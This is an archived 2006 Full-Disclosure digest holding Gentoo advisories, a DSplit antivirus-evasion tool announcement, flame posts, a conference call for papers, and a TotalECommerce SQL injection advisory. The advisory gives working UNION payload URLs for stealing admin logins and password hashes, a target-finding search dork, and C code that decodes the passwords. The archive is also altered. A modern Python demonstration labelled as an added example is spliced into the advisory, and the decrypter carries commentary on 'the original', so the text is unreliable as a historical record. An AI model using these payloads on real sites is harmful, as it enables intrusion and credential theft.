Full Disclosure mailing list archives
Re: Full-Disclosure Digest, Vol 13, Issue 8
From: "DONNY MCCOY" <DMCCOY () bbl-inc com>
Date: Sun, 05 Mar 2006 07:01:03 -0500
I will be in Denver through Thursday and will return to Syracuse on Friday. I will check voicemail and e-mail periodically as time allows. If your e-mail is urgent please contact the help desk in Syracuse at x19511. Thanks. Donny
full-disclosure 03/05/06 07:00 >>>
Send Full-Disclosure mailing list submissions to
full-disclosure () lists grok org uk
To subscribe or unsubscribe via the World Wide Web, visit
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request () lists grok org uk
You can reach the person managing the list at
full-disclosure-owner () lists grok org uk
When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."
Note to digest recipients - when replying to digest posts, please trim
your post appropriately. Thank you.
Today's Topics:
1. Re: DSplit - Tiny AV signatures Detector (ad () heapoverflow com)
2. Re: DSplit - Tiny AV signatures Detector (ad () heapoverflow com)
3. Re: DSplit - Tiny AV signatures Detector (Alexander Hristov)
4. [ GLSA 200603-01 ] WordPress: SQL injection vulnerability
(Thierry Carrez)
5. Advisory: TotalECommerce (index.asp id) Remote SQL Injection
Vulnerability. (nukedx () nukedx com)
6. [ GLSA 200603-02 ] teTeX, pTeX, CSTeX: Multiple overflows in
included XPdf code (Thierry Carrez)
7. [ GLSA 200603-03 ] MPlayer: Multiple integer overflows
(Thierry Carrez)
8. Please remove me from the list (W1nd man)
9. Re: Please remove me from the list (Alexander Hristov)
10. (no subject) (Steven Rakick)
11. Re: (no subject) (Steven Rakick)
12. Re: (no subject) (PERFECT.MATERIAL)
13. HITBSecConf2006 - Malaysia: Call for Papers (Praburaajan)
----------------------------------------------------------------------
Message: 1
Date: Sat, 04 Mar 2006 13:09:57 +0100
From: "ad () heapoverflow com" <ad () heapoverflow com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer () gmail com>
Cc: Full Disclosure <full-disclosure () lists grok org uk>,
bugtraq () securityfocus com
Message-ID: <44098395.6010604 () heapoverflow com>
Content-Type: text/plain; charset=ISO-8859-1
yeah already knowing they are most fucking bastards
Alexander Hristov wrote:
Clamav detects it and can unrar it with the unrar module
On 3/3/06, ad () heapoverflow com <ad () heapoverflow com> wrote:
DSplit is the small brother of an old tool known as UKsplitter, which is now abandoned, does not work in vmware and fails to run under windows 2003. DSplit has been coded for persons like me, targeted by AV firms, and I'm not responsible for the bad uses of it; I recall this method has been known for a long time and it's up to the AV firms to review their detection software.
http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
http://getdsplit.class101.org
usual critics, flames, can be directly sent to the Recycle Bin :>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
------------------------------
Message: 2
Date: Sat, 04 Mar 2006 13:16:33 +0100
From: "ad () heapoverflow com" <ad () heapoverflow com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer () gmail com>
Cc: Full Disclosure <full-disclosure () lists grok org uk>,
bugtraq () securityfocus com
Message-ID: <44098521.6010509 () heapoverflow com>
Content-Type: text/plain; charset=ISO-8859-1
and it clearly shows clamav is a crap antivirus where tools like
DSplit are a problem for them,
and they will detect DSplit when they can't find a better way to
detect viruses.
Alexander Hristov wrote:
Clamav detects it and can unrar it with the unrar module
On 3/3/06, ad () heapoverflow com <ad () heapoverflow com> wrote:
DSplit is the small brother of an old tool known as UKsplitter, which is now abandoned, does not work in vmware and fails to run under windows 2003. DSplit has been coded for persons like me, targeted by AV firms, and I'm not responsible for the bad uses of it; I recall this method has been known for a long time and it's up to the AV firms to review their detection software.
http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
http://getdsplit.class101.org
usual critics, flames, can be directly sent to the Recycle Bin :>
-- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
------------------------------
Message: 3
Date: Sat, 4 Mar 2006 14:41:45 +0200
From: "Alexander Hristov" <joffer () gmail com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: "ad () heapoverflow com" <ad () heapoverflow com>
Cc: Full Disclosure <full-disclosure () lists grok org uk>,
bugtraq () securityfocus com
Message-ID:
<734063a30603040441v3beb90d5n7faab639859c8dd7 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1
Well, clamav is the best AV for no money and it's very well developed,
again for no money :)
On 3/4/06, ad () heapoverflow com <ad () heapoverflow com> wrote:
and it clearly shows clamav is a crap antivirus where tools like DSplit are a problem for them, and they will detect DSplit when they can't find a better way to detect viruses.
Alexander Hristov wrote:
Clamav detects it and can unrar it with the unrar module
On 3/3/06, ad () heapoverflow com <ad () heapoverflow com> wrote:
DSplit is the small brother of an old tool known as UKsplitter, which is now abandoned, does not work in vmware and fails to run under windows 2003. DSplit has been coded for persons like me, targeted by AV firms, and I'm not responsible for the bad uses of it; I recall this method has been known for a long time and it's up to the AV firms to review their detection software.
http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
http://getdsplit.class101.org
usual critics, flames, can be directly sent to the Recycle Bin :>
-- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
------------------------------
Message: 4
Date: Sat, 04 Mar 2006 16:45:31 +0100
From: Thierry Carrez <koon () gentoo org>
Subject: [Full-disclosure] [ GLSA 200603-01 ] WordPress: SQL injection
vulnerability
To: gentoo-announce () lists gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
security-alerts () linuxsecurity com
Message-ID: <4409B61B.5060903 () gentoo org>
Content-Type: text/plain; charset="iso-8859-1"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WordPress: SQL injection vulnerability
Date: March 04, 2006
Bugs: #121661
ID: 200603-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
WordPress is vulnerable to an SQL injection vulnerability.
Background
==========
WordPress is a PHP and MySQL based content management and publishing
system.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-apps/wordpress <= 1.5.2 >= 2.0.1
Description
===========
Patrik Karlsson reported that WordPress 1.5.2 makes use of an
insufficiently filtered User Agent string in SQL queries related to
comments posting. This vulnerability was already fixed in the
2.0-series of WordPress.
Impact
======
An attacker could send a comment with a malicious User Agent parameter,
resulting in SQL injection and potentially in the subversion of the
WordPress database. This vulnerability wouldn't affect WordPress sites
which do not allow comments or which require that comments go through a
moderator.
Workaround
==========
Disable or moderate comments on your WordPress blogs.
Resolution
==========
All WordPress users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/wordpress-2.0.1"
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200603-01.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
------------------------------
Message: 5
Date: Sat, 04 Mar 2006 16:26:07 +0200
From: nukedx () nukedx com
Subject: [Full-disclosure] Advisory: TotalECommerce (index.asp id)
Remote SQL Injection Vulnerability.
To: submit () milw0rm com, full-disclosure () lists grok org uk,
bugtraq () securityfocus com
Message-ID: <20060304162607.2lyie75fm1m4gwow () webmail nukedx com>
Content-Type: text/plain; charset=ISO-8859-9
--Security Report--
Advisory: TotalECommerce (index.asp id) Remote SQL Injection
Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 04/03/06 04:36 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx () nukedx com
Web: http://www.nukedx.com
}
---
Vendor: TotalECommerce (http://www.totalecommerce.com)
Version: 1.0 and prior versions must be affected.
About: Via this method a remote attacker can inject arbitrary SQL queries into the id parameter in index.asp
Level: Critical
---
How&Example:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login+from+administradores
With example 1 a remote attacker can get the admin's encrypted password and with example 2 a remote attacker can get the admin's login name.
[PageID]: must be a working page id; you can get some from the front page.
---
Timeline:
* 04/03/2006: Vulnerability found.
* 04/03/2006: Could not contact vendor.
* 04/03/2006: File closed.
---
Exploit&Decrypter:
http://www.nukedx.com/?getxpl=18
---
Dorks: intext:"totalecommerce"
---
Original advisory: http://www.nukedx.com/?getxpl=18
---
Decrypter source in C
---
/*********************************************
* TotalECommerce PWD Decrypter *
* Coded by |SaMaN| for nukedx *
* http://www.k9world.org *
* IRC.K9World.Org *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <ctype.h>   /* toascii() */
#include <stdio.h>
#include <string.h>

int main(void)
{
    char buf[255];   /* encoded password as typed by the user */
    char out[255];   /* decoded result */
    size_t i, len;

    printf("|=------------------------------------=|\n");
    printf(" Coded by |SaMaN| @ IRC.K9World.Org\n");
    printf("|=------------------------------------=|\n\n");
    printf("Enter crypted password: ");
    if (scanf("%200s", buf) != 1)
        return 1;

    /* Each stored byte is 255 minus the original character, so the
       plaintext byte is recovered as 255 - c; toascii() keeps the low
       7 bits, as in the original tool. Input bytes are read as unsigned
       so characters above 127 in the ISO-8859 input do not go negative
       (the original used a plain char, which can be signed). */
    len = strlen(buf);
    for (i = 0; i < len && i < sizeof(out) - 1; i++)
        out[i] = (char)toascii(255 - (unsigned char)buf[i]);
    out[i] = '\0';   /* the original appended to an uninitialised buffer */

    printf("Result: %s\n", out);
    return 0;
}
---End of code---
Greets to: |SaMaN|
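The two injection bug classes reported in this digest, GLSA 200603-01's unfiltered User-Agent string written into a comment INSERT and the TotalECommerce id parameter pasted into a WHERE clause, reproduced against an in-memory SQLite database with each vulnerable query beside its hardened form, plus the log check a defender would run for non-numeric id values. This is an added example, not code from the advisories or the affected products; the table and column names (comments, pages, administradores) and the sample request lines are constructed.

```python
"""Vulnerable and hardened query patterns for the two SQL-injection classes
in this digest, against SQLite. Added example; schema and samples constructed."""
import sqlite3
from urllib.parse import parse_qs, urlsplit


def make_db():
    """Throw-away schema: one page row, one admin row, an empty comments table."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE comments (id INTEGER PRIMARY KEY, author TEXT,
                               agent TEXT, approved INTEGER NOT NULL);
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE administradores (login TEXT, senha TEXT);
        INSERT INTO pages VALUES (25, 'Home');
        INSERT INTO administradores VALUES ('admin', 'hashed-secret');
    """)
    return con


def add_comment_vulnerable(con, author, user_agent):
    """GLSA 200603-01 bug class: the User-Agent header is concatenated into
    the INSERT, so a value that closes the quoted string rewrites the rest of
    the statement (here the attacker supplies the approved flag)."""
    sql = ("INSERT INTO comments (author, agent, approved) "
           "VALUES ('%s', '%s', 0)" % (author, user_agent))
    cur = con.execute(sql)
    return con.execute("SELECT agent, approved FROM comments WHERE id = ?",
                       (cur.lastrowid,)).fetchone()


def add_comment_hardened(con, author, user_agent):
    """Bound parameters: the header is stored as data, never parsed as SQL."""
    cur = con.execute("INSERT INTO comments (author, agent, approved) "
                      "VALUES (?, ?, 0)", (author, user_agent))
    return con.execute("SELECT agent, approved FROM comments WHERE id = ?",
                       (cur.lastrowid,)).fetchone()


def page_title_vulnerable(con, page_id):
    """TotalECommerce bug class: the id parameter is concatenated unquoted, so
    a UNION pulls rows out of an unrelated table."""
    return con.execute("SELECT title FROM pages WHERE id = %s" % page_id).fetchall()


def page_title_hardened(con, page_id):
    """Validate the type first (decimal digits only), then bind the integer."""
    if not str(page_id).isdigit():
        raise ValueError("id must be a positive integer")
    return con.execute("SELECT title FROM pages WHERE id = ?",
                       (int(page_id),)).fetchall()


def flag_non_numeric_id(request_lines):
    """Detection side: return access-log request lines whose 'id' query
    parameter is not a plain integer. parse_qs decodes '+' and '%20' to
    spaces, so any injected SQL fails isdigit()."""
    flagged = []
    for line in request_lines:
        parts = line.split()
        target = parts[1] if len(parts) > 1 else line
        for value in parse_qs(urlsplit(target).query).get("id", []):
            if not value.strip().isdigit():
                flagged.append(line)
                break
    return flagged


# Constructed sample request lines, not real log data.
SAMPLE_REQUESTS = [
    "GET /shop/index.asp?secao=25&id=17 HTTP/1.1",
    "GET /shop/index.asp?secao=25&id=-1+UNION+select+login+from+administradores HTTP/1.1",
    "GET /shop/index.asp?secao=3 HTTP/1.1",
]

if __name__ == "__main__":
    db = make_db()
    crafted_agent = "Mozilla', 1) -- "
    print("vulnerable insert:", add_comment_vulnerable(db, "bob", crafted_agent))
    print("hardened insert:  ", add_comment_hardened(db, "bob", crafted_agent))
    union = "-1 UNION SELECT login FROM administradores"
    print("vulnerable select:", page_title_vulnerable(db, union))
    try:
        page_title_hardened(db, union)
    except ValueError as err:
        print("hardened select:  ", err)
    print("flagged requests: ", flag_non_numeric_id(SAMPLE_REQUESTS))
```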
------------------------------
Message: 6
Date: Sat, 04 Mar 2006 17:32:34 +0100
From: Thierry Carrez <koon () gentoo org>
Subject: [Full-disclosure] [ GLSA 200603-02 ] teTeX, pTeX, CSTeX:
Multiple overflows in included XPdf code
To: gentoo-announce () lists gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
security-alerts () linuxsecurity com
Message-ID: <4409C122.4090103 () gentoo org>
Content-Type: text/plain; charset="iso-8859-1"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: teTeX, pTeX, CSTeX: Multiple overflows in included XPdf
code
Date: March 04, 2006
Bugs: #115775
ID: 200603-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
CSTeTeX, pTeX, and teTeX include vulnerable XPdf code to handle PDF
files, making them vulnerable to the execution of arbitrary code.
Background
==========
teTex is a complete TeX distribution. It is used for creating and
manipulating LaTeX documents. CSTeX is a TeX distribution with Czech
and Slovak support. pTeX is an ASCII publishing TeX distribution.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/tetex < 2.0.2-r8 >= 2.0.2-r8
2 app-text/cstetex < 2.0.2-r2 >= 2.0.2-r2
3 app-text/ptex < 3.1.5-r1 >= 3.1.5-r1
-------------------------------------------------------------------
3 affected packages on all of their supported architectures.
-------------------------------------------------------------------
Description
===========
CSTeX, teTex, and pTeX include XPdf code to handle PDF files. This XPdf
code is vulnerable to several heap overflows (GLSA 200512-08) as well
as several buffer and integer overflows discovered by Chris Evans
(CESA-2005-003).
Impact
======
An attacker could entice a user to open a specially crafted PDF file
with teTeX, pTeX or CSTeX, potentially resulting in the execution of
arbitrary code with the rights of the user running the affected
application.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All teTex users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/tetex-2.0.2-r8"
All CSTeX users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/cstetex-2.0.2-r2"
All pTeX users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/ptex-3.1.5-r1"
References
==========
[ 1 ] CVE-2005-3193
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3193
[ 2 ] GLSA 200512-08
http://www.gentoo.org/security/en/glsa/glsa-200512-08.xml
[ 3 ] CESA-2005-003
http://scary.beasts.org/security/CESA-2005-003.txt
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200603-02.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
------------------------------
Message: 7
Date: Sat, 04 Mar 2006 18:26:18 +0100
From: Thierry Carrez <koon () gentoo org>
Subject: [Full-disclosure] [ GLSA 200603-03 ] MPlayer: Multiple
integer overflows
To: gentoo-announce () lists gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
security-alerts () linuxsecurity com
Message-ID: <4409CDBA.8060405 () gentoo org>
Content-Type: text/plain; charset="iso-8859-1"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: MPlayer: Multiple integer overflows
Date: March 04, 2006
Bugs: #115760, #122029
ID: 200603-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
MPlayer is vulnerable to integer overflows in FFmpeg and ASF decoding
that could potentially result in the execution of arbitrary code.
Background
==========
MPlayer is a media player capable of handling multiple multimedia file
formats.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-video/mplayer < 1.0.20060217 >= 1.0.20060217
Description
===========
MPlayer makes use of the FFmpeg library, which is vulnerable to a heap
overflow in the avcodec_default_get_buffer() function discovered by
Simon Kilvington (see GLSA 200601-06). Furthermore, AFI Security
Research discovered two integer overflows in ASF file format decoding,
in the new_demux_packet() function from libmpdemux/demuxer.h and the
demux_asf_read_packet() function from libmpdemux/demux_asf.c.
Impact
======
An attacker could craft a malicious media file which, when opened using
MPlayer, would lead to a heap-based buffer overflow. This could result
in the execution of arbitrary code with the permissions of the user
running MPlayer.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All MPlayer users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=media-video/mplayer-1.0.20060217"
References
==========
[ 1 ] CVE-2005-4048
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4048
[ 2 ] CVE-2006-0579
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0579
[ 3 ] GLSA 200601-06
http://www.gentoo.org/security/en/glsa/glsa-200601-06.xml
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200603-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
------------------------------
Message: 8
Date: Sat, 4 Mar 2006 22:16:10 +0200
From: W1nd man <w1ndm4n () walla com>
Subject: [Full-disclosure] Please remove me from the list
To: <full-disclosure () lists grok org uk>
Message-ID: <1141503369.961000-13997465-23441 () walla com>
Content-Type: text/plain; charset="us-ascii"
------------------------------
Message: 9
Date: Sun, 5 Mar 2006 03:52:28 +0200
From: "Alexander Hristov" <joffer () gmail com>
Subject: Re: [Full-disclosure] Please remove me from the list
To: "W1nd man" <w1ndm4n () walla com>
Cc: full-disclosure () lists grok org uk
Message-ID:
<734063a30603041752v7a8cc6efnd28861cae0f8be32 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1
U can remove yourself from here :
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
On 3/4/06, W1nd man <w1ndm4n () walla com> wrote:
Please remove me from the list
-- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
------------------------------
Message: 10
Date: Sat, 4 Mar 2006 18:01:51 -0800
From: Steven Rakick <stevenrakick () yahoo com>
Subject: [Full-disclosure] (no subject)
To: full-disclosure () lists grok org uk
Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59 () www c0replay net>
Content-Type: text/plain; charset="iso-8859-1"
Hello HACKERZ!,
Your personal DONGEZ to this message.
Sincerely,
BanHaus manager
------------------------------
Message: 11
Date: Sat, 4 Mar 2006 20:28:32 -0800 (PST)
From: Steven Rakick <stevenrakick () yahoo com>
Subject: Re: [Full-disclosure] (no subject)
To: full-disclosure () lists grok org uk
Message-ID: <20060305042832.34191.qmail () web53201 mail yahoo com>
Content-Type: text/plain; charset=iso-8859-1
Not that it matters but...
Received: from www.c0replay.net (unknown [206.251.72.74])
by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
for <full-disclosure () lists grok org uk>; Sun, 5 Mar 2006 02:02:03 +0000 (GMT)
Date: Sat, 4 Mar 2006 18:01:51 -0800
To: full-disclosure () lists grok org uk
From: Steven Rakick <stevenrakick () yahoo com>
Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59 () www c0replay net>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]
------------------------------
Message: 12
Date: Sun, 5 Mar 2006 00:34:03 -0500
From: PERFECT.MATERIAL <perfect.material () gmail com>
Subject: Re: [Full-disclosure] (no subject)
To: "Steven Rakick" <stevenrakick () yahoo com>
Cc: full-disclosure () lists grok org uk
Message-ID: <631ac1d90603042134n7a22e7aale14d2aa7914dda58 () mail gmail com>
Content-Type: text/plain; charset="iso-8859-1"
Dick Breath,
You should sign your electronic mail with some unhackable crypto technology. That way you will never need to show off your cut and paste technology to the others.
You are irresponsible.
Not that it matters but...
PERFECT.MATERIAL
On 3/4/06, Steven Rakick <stevenrakick () yahoo com> wrote:
Not that it matters but...
Received: from www.c0replay.net (unknown
[206.251.72.74])
by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
for <full-disclosure () lists grok org uk>;
Sun, 5 Mar 2006 02:02:03 +0000 (GMT)
Date: Sat, 4 Mar 2006 18:01:51 -0800
To: full-disclosure () lists grok org uk
From: Steven Rakick <stevenrakick () yahoo com>
Message-ID:
<1e7e8bed62fc8c339e776bd2ef170a59 () www c0replay net>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]
------------------------------
Message: 13
Date: Sun, 05 Mar 2006 13:34:43 +0800
From: Praburaajan <prabu () hackinthebox org>
Subject: [Full-disclosure] HITBSecConf2006 - Malaysia: Call for Papers
To: full-disclosure () lists grok org uk, dailydave () lists immunitysec com, pen-test () securityfocus com, bugtraq () securityfocus com, Voipsec () voipsa org, submit () milw0rm com, webappsec () securityfocus com, ipv6 () ietf org, security-basics () securityfocus com
Message-ID: <440A7873.4000202 () hackinthebox org>
Content-Type: text/plain; charset=windows-1252; format=flowed
Greetings from Hack in The Box --
We are pleased to announce that the Call for Paper (CfP) for HITBSecConf2006 - Malaysia is now open! Set to take place from September 18th - 21st 2006 at The Westin Kuala Lumpur, this year's conference promises to once again deliver an international deep-knowledge security conference. HITBSecConf has been described as "the most intimate of hacker gatherings" and is the largest network security conference in Asia!
SUBMISSION
HITBSecConf is a deep-knowledge technical conference. Talks that are more technical or that discuss new and never before seen attack methods are of more interest than a subject that has been covered several times before. Summaries not exceeding 250 words should be submitted (in plain text format) to cfp -at- hackinthebox.org for review and possible inclusion in the programme.
Submissions are due no later than 1st of May 2006.
TOPICS
Topics of interest include, but are not limited to the following:
* Analysis of network and security vulnerabilities
* Firewall technologies
* Intrusion detection
* Data Recovery and Incident Response
* GPRS, 3G and CDMA Security
* Identification and Entity Authentication
* Network Protocol and Analysis
* Smart Card Security
* Virus and Worms
* WLAN and Bluetooth Security
* Analysis of malicious code
* Applications of cryptographic techniques
* Analysis of attacks against networks and machines
* Denial-of-service attacks and countermeasures
* File system security
* Security in heterogeneous and large-scale environments
* Techniques for developing secure systems
PLEASE NOTE: We do not accept product or vendor related pitches. If your talk involves an advertisement for a new product or service your company is offering, please do not submit.
Your submission should include:
* Name, title, address, email and phone/contact number
* Draft of the proposed presentation (in PDF or PowerPoint format), proof of concept for tools and exploits, etc.
* Short biography, qualification, occupation, achievement and affiliations (limit 150 words).
* Summary or abstract for your presentation (limit 250 words)
* Time (45-60 minutes including time for discussion and questions)
* Technical requirements (video, internet, wireless, audio, etc.)
Each non-resident speaker will receive accommodation for 3 nights at The Westin Kuala Lumpur. For each non-resident speaker, HITB will cover travel expenses (through our airline partner, Malaysia Airlines) up to USD 1,000.00.
HITBSecConf2006 CTF Daemons/Flags
As part of our annual conference, HITB organizes an attack and defense "hack-game" commonly referred to as *Capture The Flag* or CTF. As part of our continued efforts to improve on the game and raise the bar each year, we are inviting speakers to contribute a daemon and exploit for this year's CTF competition.
For further details on the submission process, kindly e-mail dinesh -at- hackinthebox.org or ctfinfo -at- hackinthebox.org.
On behalf of The HITB Team, we thank you and look forward to receiving your submissions! See you guys in September!
HITBSecConf2006 - Malaysia: Deep-Knowledge Network Security
http://conference.hackinthebox.org/hitbsecconf2006kl/
http://conference.hitb.org/hitbsecconf2006kl/
------------------------------
End of Full-Disclosure Digest, Vol 13, Issue 8
**********************************************